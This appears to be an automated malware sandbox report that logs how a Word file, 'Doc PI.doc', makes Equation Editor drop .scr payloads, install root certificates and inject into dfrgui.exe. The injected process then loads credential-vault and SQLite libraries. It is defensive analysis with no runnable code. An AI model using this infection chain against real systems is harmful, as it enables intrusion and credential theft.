            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: virtdisk.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: fltlib.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: sxshared.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Doc PI.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Doc PI.doc
            Source: C:\Users\user\AppData\Roaming\loud89334.scrFile opened: C:\Windows\SysWOW64\MsftEdit.DLLJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Roaming\loud89334.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: loud89334.scr, 00000005.00000002.370217484.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, loud89334.scr, 00000005.00000002.370034664.0000000000620000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dfrgui.pdb source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000003.394123184.00000000009D0000.00000004.00000001.00020000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000003.394273812.0000000000FA0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000002.635533344.000000000139E000.00000002.00000001.01000000.00000009.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000000.419589131.000000000139E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: dfrgui.pdb2D source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000003.394123184.00000000009D0000.00000004.00000001.00020000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000003.394273812.0000000000FA0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: loud89334.scr, loud89334.scr, 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.635736352.0000000002220000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.407159126.0000000000660000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.407445701.0000000001F10000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.635736352.00000000020A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: >.pdb'<project></project>File source: loud89334.scr, 00000005.00000000.359382718.0000000000AB2000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.635447198.0000000000660000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000294C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000000.419606909.00000000033CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.478820963.000000000067C000.00000004.80000000.00040000.00000000.sdmp, loudzx[1].scr.2.dr, loud89334.scr.2.dr
            Source: loudzx[1].scr.2.drStatic PE information: 0xCC2B3E32 [Mon Jul 18 16:07:14 2078 UTC]
            Source: sqlite3.dll.8.drStatic PE information: section name: /4
            Source: sqlite3.dll.8.drStatic PE information: section name: /19
            Source: sqlite3.dll.8.drStatic PE information: section name: /31
            Source: sqlite3.dll.8.drStatic PE information: section name: /45
            Source: sqlite3.dll.8.drStatic PE information: section name: /57
            Source: sqlite3.dll.8.drStatic PE information: section name: /70
            Source: sqlite3.dll.8.drStatic PE information: section name: /81
            Source: sqlite3.dll.8.drStatic PE information: section name: /92
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00648F58 push eax; retf 2_2_00648F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006401F4 push eax; retf 2_2_006401F5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006456A4 pushad ; retn 0064h2_2_006456A5
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 5_2_003025E7 push ebx; retf 5_2_003025EA
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0041B855 pushad ; iretd 6_2_0041B884
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00407936 push eax; iretd 6_2_00407937
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_004191E7 push ecx; ret 6_2_004191E8
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00415A7A push esi; retf 6_2_00415AB4
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040EB41 push 7B0B5DBBh; iretd 6_2_0040EB4A
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0042F3B2 push eax; ret 6_2_0042F3B4
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00419C00 pushad ; retf 6_2_00419C2D
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00415C3E push esp; retf 6_2_00415C8E
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00403640 push eax; ret 6_2_00403642
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0041F75D push eax; iretd 6_2_0041F75E
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DADFA1 push ecx; ret 6_2_00DADFB4
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CD39A2 push eax; iretd 7_2_00CD39A3
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CCFA9A pushad ; iretd 7_2_00CCFAC9
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CBBB7B push eax; iretd 7_2_00CBBB7C
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CD44FC push esi; retf 7_2_00CD44FD
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CCD42C push ecx; ret 7_2_00CCD42D
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CE35F7 push eax; ret 7_2_00CE35F9
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CC2D86 push 7B0B5DBBh; iretd 7_2_00CC2D8F
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CCDE45 pushad ; retf 7_2_00CCDE72
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeCode function: 7_2_00CD4604 push eax; ret 7_2_00CD462C
            Source: loudzx[1].scr.2.drStatic PE information: section name: .text entropy: 7.00518309231931
            Source: loud89334.scr.2.drStatic PE information: section name: .text entropy: 7.00518309231931

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\loud89334.scrJump to dropped file
            Installs new ROOT certificates
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scrJump to dropped file
            Source: C:\Windows\SysWOW64\dfrgui.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\loud89334.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
